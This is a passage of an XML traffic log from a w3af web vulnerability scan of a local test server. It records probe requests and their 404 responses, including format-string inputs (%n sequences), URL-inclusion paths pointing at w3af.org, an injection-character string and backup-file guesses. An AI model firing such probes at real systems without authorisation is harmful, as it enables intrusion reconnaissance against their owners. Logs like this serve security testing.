                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="309">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="310">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="314">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="315">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="316">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="317">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="317">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="318">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="320">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="321">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="321">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="322">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="322">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="323">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="325">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="325">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="327">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="329">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="330">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="331">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post~ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="332">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="333">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="334">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="334">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="337">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post.gzip HTTP/1.1</status>
